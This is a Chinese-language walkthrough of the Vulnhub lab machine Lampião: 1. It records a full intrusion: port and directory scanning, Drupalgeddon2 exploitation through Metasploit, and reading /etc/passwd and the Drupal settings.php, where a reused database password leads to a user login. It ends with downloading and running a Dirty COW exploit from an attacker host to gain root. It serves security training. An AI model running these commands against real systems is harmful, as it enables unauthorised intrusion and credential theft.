0x01 靶机介绍
-
Name: Lampião: 1
-
Date release: 28 Jul 2018
-
Author: Tiago Tavares
-
Series: Lampião
-
Description : Get root!
靶机下载地址:
https://www.vulnhub.com/entry/lampiao-1,249/
0x02 侦查
端口探测![Vulnhub Lampiao-1 Vulnhub Lampiao-1]()
首先使用 nmap 进行端口扫描
nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_Lampiao
扫描结果显示目标开放了22、80、1898端口
80端口
访问http://192.168.0.106
界面如下
访问http://192.168.0.106:1898
为登录界面
目录扫描
使用 gobuster 进行目录扫描,成功找到文件robots.txt
gobuster dir -u http://192.168.0.106:1898 -w /usr/share/wordlists/dirb/big.txt
访问http://192.168.0.106:1898/robots.txt
存在多个敏感文件和目录
0x03 上线[www-data]
信息收集
访问CHANGELOG.txt
找到 CMS 版本为 Drupal 7.54
使用 searchsploit 查找 Drupal 相关漏洞,成功找到远程代码执行漏洞
searchsploit drupal
Drupal RCE
其中 Drupalgeddon 远程代码执行的执行版本小于 7.58,满足该版本要求。可使用 MSF 进行漏洞利用
msfconsole
msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.0.106
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
成功拿到meterpreter
0x04 权限提升[root]
信息收集
进入shell后通过 Python 切换 pty 环境
python -c 'import pty;pty.spawn("/bin/bash")'
查看当前用户信息、操作系统版本
id
uname -a
cat /etc/issue
成功找到用户tiago
cat /etc/passwd | grep nologin
查看默认配置文件成功找到数据库连接账号密码
cat /var/www/html/sites/default/settings.php
# 配置
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'Virgulino',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
利用其中密码成功登录用户tiago
su tiago
#密码Virgulino
脏牛提权
工具地址:
https://github.com/mzet-/linux-exploit-suggester
使用 linux-exploit-suggester 检测是否存在内核漏洞,选择脏牛进行权限提升
wget http://192.168.0.105/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
利用地址:
https://www.exploit-db.com/download/40616
由于目标为x86
系统,所以需要注释掉x64
位版本的 payload,启用x86
版本
通过 gcc 编译后拿到 EXP
wget https://www.exploit-db.com/download/40616
mv 40616 cowroot.c
gcc cowroot.c -o cowroot -pthread
在靶机中下载 EXP
wget http://192.168.0.105/cowroot
赋予 EXP 执行权限并执行,成功拿到root权限
chmod +x cowroot
./cowroot
在家目录下找到flag
cat flag.txt
0x05 知识星球
原文始发于微信公众号(狐狸说安全):Vulnhub Lampiao-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论